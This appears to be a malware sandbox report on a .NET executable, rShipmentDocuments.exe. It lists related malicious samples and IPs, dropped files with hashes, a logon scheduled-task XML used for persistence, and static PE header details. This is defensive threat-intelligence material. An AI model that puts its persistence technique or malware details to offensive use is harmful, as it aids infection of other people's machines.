                                                    SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    up7bJYQosk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    XbER2eIAaa.exeGet hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    SP0npSA64a.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    ZfzNdscQNj.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 149.154.167.220
                                                    GYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    TELEGRAMRUz76ik.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 149.154.167.220
                                                    LOI SPECIFIFCATION.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    New Purchase Order Ref#0012573.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    Swift Payment.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 149.154.167.220
                                                    SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    up7bJYQosk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    XbER2eIAaa.exeGet hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    SP0npSA64a.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    ZfzNdscQNj.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 149.154.167.220
                                                    GYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    HostingvpsvilleruRUSecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 185.230.141.85
                                                    Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 185.230.141.85
                                                    LisectAVT_2403002A_149.exeGet hashmaliciousAmadeyBrowse
                                                    • 80.76.42.67
                                                    am.exeGet hashmaliciousAmadeyBrowse
                                                    • 80.76.42.67
                                                    a.exeGet hashmaliciousAmadeyBrowse
                                                    • 80.76.42.67
                                                    kdevtmpfsiGet hashmaliciousXmrigBrowse
                                                    • 185.156.179.225
                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                    • 185.246.118.197
                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 185.246.118.198
                                                    WKKdXepXFi.elfGet hashmaliciousMiraiBrowse
                                                    • 185.246.118.187
                                                    c8O3JEibrM.elfGet hashmaliciousMiraiBrowse
                                                    • 185.246.118.178
                                                    CLOUDFLARENETUSl0T55kCdTI.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.53.8
                                                    ATT4416530006_Swissquote.htmGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.18.11.207
                                                    curriculo_OUTUBRO_2024_Bmd2xZtsZtjm7sO_curriculo_091024.LnK.lnkGet hashmaliciousUnknownBrowse
                                                    • 172.67.200.173
                                                    X_VISUALIZAR_MANDADO_0427384.LnK.lnkGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.53.8
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.53.8
                                                    DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                                                    • 188.114.96.3
                                                    YtpxPCS4ke.elfGet hashmaliciousMiraiBrowse
                                                    • 162.159.132.60
                                                    View and Print Online.pdfGet hashmaliciousUnknownBrowse
                                                    • 104.18.95.41
                                                    Order160311_Reference.htaGet hashmaliciousAzorultBrowse
                                                    • 104.21.14.133

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.Variant.Lazy.153341.13263.18139.exeGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    SecuriteInfo.com.Variant.Lazy.153341.13263.18139.exeGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    z76ik.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 188.114.96.3
                                                    FMAudit.Installer_9652_1238001249.exeGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    z51NEWPO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                    • 188.114.96.3
                                                    LOI SPECIFIFCATION.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.96.3
                                                    New Purchase Order Ref#0012573.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.96.3
                                                    Swift Payment.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 188.114.96.3
                                                    SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.96.3
                                                    up7bJYQosk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 188.114.96.3
                                                    3b5074b1b5d032e5620f69f9f700ff0ehttp://kale.amwebsolution.com/yuop/66c323e1543cd_ffrs.exeGet hashmaliciousUnknownBrowse
                                                    • 149.154.167.220
                                                    https://wav-installers.s3.amazonaws.com/Stubs/WaveBrowser_Stub-v1.5.18.3-wpf.exeGet hashmaliciousUnknownBrowse
                                                    • 149.154.167.220
                                                    Kevin Burrell shared 'Team A Pictures and Presentation' in 'Eric Meyn's Workspace' with you.msgGet hashmaliciousUnknownBrowse
                                                    • 149.154.167.220
                                                    https://www.canva.com/design/DAGTGtfEYnw/CziuYyD8EEWyTr61OD4BbQ/edit?utm_content=DAGTGtfEYnw&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttoGet hashmaliciousHtmlDropperBrowse
                                                    • 149.154.167.220
                                                    36.msiGet hashmaliciousNumandoBrowse
                                                    • 149.154.167.220
                                                    33.msiGet hashmaliciousNumandoBrowse
                                                    • 149.154.167.220
                                                    QbAwyjyAk3.lnkGet hashmaliciousNumandoBrowse
                                                    • 149.154.167.220
                                                    btm4e0L3pw.lnkGet hashmaliciousNumandoBrowse
                                                    • 149.154.167.220
                                                    26.msiGet hashmaliciousNumandoBrowse
                                                    • 149.154.167.220
                                                    Untitled.emlGet hashmaliciousHTMLPhisherBrowse
                                                    • 149.154.167.220

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZOlmYtPdlO.exe.log

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rShipmentDocuments.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2232
                                                    Entropy (8bit):5.379736180876081
                                                    Encrypted:false
                                                    SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YUyus:tLHyIFKL3IZ2KRH9Oug8s
                                                    MD5:D8B04C656CC5C9421FAD6B626E6A2EF1
                                                    SHA1:68B625362ACEC0E85A074829D5ACF94EEB5C97E6
                                                    SHA-256:CACA00B0843523626D1560DD9244C2ED9F1D15628D14B3231DD05A0AC1D60293
                                                    SHA-512:1FC0FEA68AC201F7DE945FA132434E27C255F08B30B3CBBAF825A1809D7ED706D8569CF1B75918A3383E9AA7F1DC52CEC7D60725F963801F97B1012C82165D60
                                                    Malicious:false
                                                    Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2avoa3gt.4q0.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4krynbdl.33r.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5t3bh3t3.ehn.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jycxlpzp.vxt.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_me3gq5m1.waw.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skfts1sn.dv5.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wysnqmj2.m2l.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkydfyjv.g11.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\tmp44A0.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    File Type:XML 1.0 document, ASCII text
                                                    Category:dropped
                                                    Size (bytes):1576
                                                    Entropy (8bit):5.110917865838122
                                                    Encrypted:false
                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtagKxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTvev
                                                    MD5:FF538A65DF2E9BBCC2651DCF881BD89F
                                                    SHA1:429AE22BF3F5A2171CA564673CB52E6A0A1D276C
                                                    SHA-256:F67551C7BD363B57A314ED9DA63D9B3C205C844D6BEAC3CF7B550F68E6689C88
                                                    SHA-512:349CCC3D0BB83621DE247D75039C2A908BF3FBDCAA227E650ED6311E948E227086F0DF8937988776D50848841033DBF7249EC7C7129C1AF6CB019D40712F2571
                                                    Malicious:true
                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                    C:\Users\user\AppData\Local\Temp\tmp5356.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    File Type:XML 1.0 document, ASCII text
                                                    Category:dropped
                                                    Size (bytes):1576
                                                    Entropy (8bit):5.110917865838122
                                                    Encrypted:false
                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtagKxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTvev
                                                    MD5:FF538A65DF2E9BBCC2651DCF881BD89F
                                                    SHA1:429AE22BF3F5A2171CA564673CB52E6A0A1D276C
                                                    SHA-256:F67551C7BD363B57A314ED9DA63D9B3C205C844D6BEAC3CF7B550F68E6689C88
                                                    SHA-512:349CCC3D0BB83621DE247D75039C2A908BF3FBDCAA227E650ED6311E948E227086F0DF8937988776D50848841033DBF7249EC7C7129C1AF6CB019D40712F2571
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                    C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):731136
                                                    Entropy (8bit):7.836582313791281
                                                    Encrypted:false
                                                    SSDEEP:12288:OskYjNiZUyOEXNHqmMqNuGV7w1dgRFreBtN0V9a+W3OeqWNXWqpIlZreBz:OskY4ZUyOoVjMqNvV02RliSa+W3OeqbS
                                                    MD5:FF8C4AB4EC18F05864879323F4A41050
                                                    SHA1:6552329870D1A2627B5E9B6B6CFD3D2EFEA87735
                                                    SHA-256:DB4523C5FA05ACF8D6C8D47C722A5C39A728078F94A7F6877FAA0A6FB87AFC33
                                                    SHA-512:3F9F38DDDDC665FE1664AE356BD18D70767D0DF3925DFE0A1AD324DC29CB1738F7E1E49DDB55D62FF1204D4ECBA13A3E557EBBFFB2D8DD8AEA35B10595E76B67
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                    • Antivirus: Virustotal, Detection: 38%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.g..............0.................. ...@....@.. ....................................`.....................................W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B........................H......................pr.../...........................................0..........*....0...........(.......s....o.....*....0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}....*.0...........{....*..0............}.

                                                    C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.836582313791281
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:rShipmentDocuments.exe
                                                    File size:731'136 bytes
                                                    MD5:ff8c4ab4ec18f05864879323f4a41050
                                                    SHA1:6552329870d1a2627b5e9b6b6cfd3d2efea87735
                                                    SHA256:db4523c5fa05acf8d6c8d47c722a5c39a728078f94a7f6877faa0a6fb87afc33
                                                    SHA512:3f9f38ddddc665fe1664ae356bd18d70767d0df3925dfe0a1ad324dc29cb1738f7e1e49ddb55d62ff1204d4ecba13a3e557ebbffb2d8dd8aea35b10595e76b67
                                                    SSDEEP:12288:OskYjNiZUyOEXNHqmMqNuGV7w1dgRFreBtN0V9a+W3OeqWNXWqpIlZreBz:OskY4ZUyOoVjMqNvV02RliSa+W3OeqbS
                                                    TLSH:CDF402947601F4AFC8A38B714970EE3656606D7ED217D203A5EB0CABB90C6D79F042F2
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.g..............0.................. ...@....@.. ....................................`................................

                                                    File Icon

                                                    Icon Hash:01242c66198d8d9e

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4b2eee
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x67086BC5 [Fri Oct 11 00:05:25 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
